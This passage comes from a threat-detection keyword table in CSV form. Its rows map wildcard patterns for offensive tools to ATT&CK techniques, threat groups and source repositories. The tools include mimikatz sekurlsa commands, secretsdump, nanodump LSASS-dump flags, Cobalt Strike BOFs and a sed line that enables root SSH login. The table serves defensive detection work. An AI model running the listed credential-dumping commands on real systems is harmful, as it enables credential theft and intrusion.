T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*secinject.x64*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*secinject.x86*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*secinject/src*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*SecLists*","offensive_tool_keyword","SecLists","SecLists is the security testers companion. Its a collection of multiple types of lists used during security assessments. collected in one place. List types include usernames. passwords. URLs. sensitive data patterns. fuzzing payloads. web shells. and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.","T1210.002 - T1212.001 - T1589.001","TA0040 - TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/danielmiessler/SecLists","1","1","N/A","N/A","10","49213","23242","2023-09-23T07:17:59Z","2012-02-19T01:30:18Z" +"*--seclogon-leak-local*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*--seclogon-leak-remote*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*secrary*","offensive_tool_keyword","Github Username","github username hosting process injection codes ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secrary","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*secredump.exe*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*secret_fragment_exploit.py */_fragment*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*SecretFinder.py*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*SecretFinder-master.zip*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*secrets/secrets_manager/secrets.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*secrets_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*secrets_dump_dcsync*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*secretsdump *--silent*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*secretsdump -sam *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*secretsdump*","offensive_tool_keyword","POC","Zerologon CVE exploitation (could be other malicious tools too)","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" +"*secretsdump.*.pyc*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*secretsdump.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*secretsdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*secretsdump.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*secretsdump.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*secretsdump.py*","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*secretsquirrel/the-backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*sec-shinject *","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*securesocketfunneling*","offensive_tool_keyword","securesocketfunneling","Secure Socket Funneling (SSF) is a network tool and toolkit It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer","T1071.001 - T1573 - T1572","TA0003 - TA0009 - ","N/A","N/A","POST Exploitation tools","https://securesocketfunneling.github.io/ssf/#home","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*security-onion*","offensive_tool_keyword","security-onion","Security Onion is a free and open source Linux distribution for threat hunting. enterprise security monitoring. and log management. It includes Elasticsearch. Logstash. Kibana. Snort. Suricata. Bro. Wazuh. Sguil. Squert. NetworkMiner. and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes","T1059 - T1059.001 - T1059.003 - T1059.004","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Infosec Operation system","https://github.com/Security-Onion-Solutions/security-onion","1","1","N/A","N/A","10","3033","534","2021-04-16T12:14:31Z","2015-03-24T20:15:23Z" +"*securitywithoutborders*","offensive_tool_keyword","Github Username","pentest documentations","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/securitywithoutborders","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*sed 's/#PermitRootLogin prohibit-password/PermitRootLogin Yes' /etc/ssh/sshd_config*","greyware_tool_keyword","sed","allowing root login for ssh","T1078 - T1078.003 - T1021 - T1021.004","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*SeeYouCM-Thief.git*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*SeeYouCM-Thief-main*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*sekurlsa *","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::bootkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::cloudap*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::credman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::dpapi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::dpapisystem*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::ekeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function dumps DPAPI backup keys for users who have logged on to the system","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::kerberos*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::krbtgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::livessp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function retrieves plaintext credentials from the LSA secrets in memory.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::minidump*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - 